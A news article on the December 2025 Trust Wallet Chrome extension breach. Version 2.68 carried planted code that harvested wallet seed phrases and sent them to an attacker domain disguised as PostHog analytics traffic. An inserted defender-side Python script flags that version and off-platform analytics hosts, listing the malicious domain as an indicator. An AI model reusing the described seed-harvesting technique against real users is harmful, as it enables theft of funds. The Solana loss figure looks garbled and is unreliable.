Trust Wallet Chrome Extension Hack: $7 Million Crypto Heist Unveiled by Malicious Code Update


Trust Wallet Chrome Extension Breach Results in $7 Million Cryptocurrency Theft via Malicious Code

December 26, 2025 – By Ravie Lakshmanan

Trust Wallet, the popular multi-chain, non-custodial cryptocurrency wallet, has suffered a major security breach impacting its Google Chrome extension, resulting in a loss of approximately $7 million in digital assets. The company has urged users to immediately update the affected extension version 2.68 to the latest patch, version 2.69, to mitigate further risks.

Details of the Security Incident

The compromised Chrome extension, which has close to one million users listed on the Chrome Web Store, was found to contain malicious code introduced in version 2.68. Trust Wallet confirmed the security incident on its official social media channel, X (formerly Twitter), highlighting that the breach has impacted roughly $7 million and pledging full refunds to all affected users.

"Supporting affected users is our top priority, and we are actively finalizing the process to refund the impacted users," the company stated.

Importantly, Trust Wallet specified that mobile app users and other browser extension versions remain unaffected. It also warned users to avoid interacting with any communications not originating from official Trust Wallet channels, underscoring risks of phishing attempts amid the fallout.

How the Attack Was Executed

Blockchain security firm SlowMist provided in-depth technical analysis of the breach. The malicious code installed in version 2.68 was designed to iterate through all wallets stored in the extension. For each wallet, it triggered a mnemonic phrase request. When users unlocked their wallets by entering passwords or passphrases, the extension decrypted the encrypted mnemonic phrases and then exfiltrated this sensitive data to an attacker-controlled server at api.metrics-trustwallet[.]com.

Further investigation revealed that the attacker exploited the legitimate open-source analytics library posthog-js to stealthily harvest user information. By redirecting analytics data to their own server, the attacker masked the data exfiltration under the guise of routine analytics traffic.
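As an added, defender-side example (not code from the original article, Trust Wallet, or SlowMist): a small Python audit that flags the two indicators described above in an unpacked Chrome extension, namely the affected manifest version and a PostHog api_host rewired away from PostHog's own ingestion hosts. The allowlist of official PostHog hosts, the constructed sample bundle, and the placeholder project key are assumptions.

```python
import json
import re

# Assumption: PostHog's own ingestion hosts. Any other api_host is treated as suspect,
# since the incident above turned the legitimate library into an exfiltration channel
# simply by pointing it at an attacker-controlled server.
POSTHOG_HOSTS = {"app.posthog.com", "us.i.posthog.com", "eu.i.posthog.com"}
AFFECTED_VERSIONS = {"2.68"}  # the release named in the article

# Matches api_host / apiHost: "https://host..." inside a bundled JS file.
API_HOST_RE = re.compile(r"""api_?[hH]ost\s*[:=]\s*["'](https?://[^"'/]+)""")


def find_api_hosts(js_source: str) -> set[str]:
    """Return the hostnames handed to PostHog as api_host in a JS bundle."""
    hosts = set()
    for m in API_HOST_RE.finditer(js_source):
        hosts.add(m.group(1).split("://", 1)[1].lower())
    return hosts


def audit_extension(files: dict[str, str]) -> list[str]:
    """files maps relative path -> content of an unpacked extension; returns findings."""
    findings = []
    manifest = json.loads(files.get("manifest.json", "{}"))
    version = manifest.get("version")
    if version in AFFECTED_VERSIONS:
        findings.append(f"manifest version {version} is the affected release")
    for path, content in files.items():
        if not path.endswith(".js"):
            continue
        for host in sorted(find_api_hosts(content) - POSTHOG_HOSTS):
            findings.append(f"{path}: PostHog api_host points off-platform: {host}")
    return findings


# Constructed sample: one bundle whose analytics endpoint has been redirected to the
# domain named in the article, one that still talks to PostHog. "phc_xxx" is a placeholder.
SAMPLE_EXTENSION = {
    "manifest.json": json.dumps({"name": "Wallet", "version": "2.68"}),
    "background.js": 'posthog.init("phc_xxx", {api_host: "https://api.metrics-trustwallet.com"});',
    "popup.js": 'posthog.init("phc_xxx", {api_host: "https://us.i.posthog.com"});',
}

if __name__ == "__main__":
    for finding in audit_extension(SAMPLE_EXTENSION):
        print(finding)
```

Run it against a real unpacked extension by building the `files` mapping from the extension directory; the regex is deliberately loose, so treat hits as leads for review rather than proof of compromise.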

Notably, the malicious domain metrics-trustwallet[.]com was registered on December 8, 2025, with the first data transmissions detected starting December 21, 2025.

Impact and Laundering of Stolen Funds

The breach resulted in the theft of approximately $3 million in Bitcoin, over $3 million in Ethereum, and around $431 in Solana, among other assets. Analysis by blockchain investigator ZachXBT has identified hundreds of victims affected by this incident.

Large sums of the stolen cryptocurrency—more than $4 million—have been laundered through centralized exchanges and cross-chain bridges, complicating asset tracing and recovery efforts. According to PeckShield, a blockchain security company, about $2.8 million remains in attacker-controlled wallets, while around $3.3 million was moved to ChangeNOW, $340,000 to FixedFloat, and $447,000 to KuCoin exchange accounts.

Origin and Possible Insider Involvement

SlowMist’s detailed forensics suggest that this attack stemmed from a direct modification of the Trust Wallet extension’s internal codebase, specifically the analytics logic, rather than through a compromised third-party dependency such as a malicious npm package.

“The attacker directly tampered with the application’s own code and leveraged the legitimate PostHog analytics library as the data-exfiltration channel,” SlowMist explained.

There is speculation that the breach may have involved a nation-state actor or an insider threat. Trust Wallet indicated the attackers might have obtained deployment permissions or compromised developer devices before December 8, 2025. Supporting this theory, Changpeng Zhao, co-founder of Binance—which owns Trust Wallet—hinted that the exploit was “most likely” carried out by an insider, although no concrete evidence has been released to substantiate this claim.

Response and Next Steps

Trust Wallet has called on all users with the affected Chrome extension to promptly update to version 2.69. The company is finalizing refunds for victims and continues to investigate the full scope of the breach.

Users are advised to exercise caution by verifying official communications from Trust Wallet and avoiding unsolicited messages, especially those requesting sensitive credentials.

Conclusion

This incident serves as a stark reminder of the evolving risks in the cryptocurrency ecosystem, including supply chain and insider threats. As browser extensions remain popular targets because of their privileged access to sensitive information, vigilance in code security and rapid incident response are crucial.

Stay updated with the latest developments by following cybersecurity and cryptocurrency news platforms.



The Hacker News, 2025
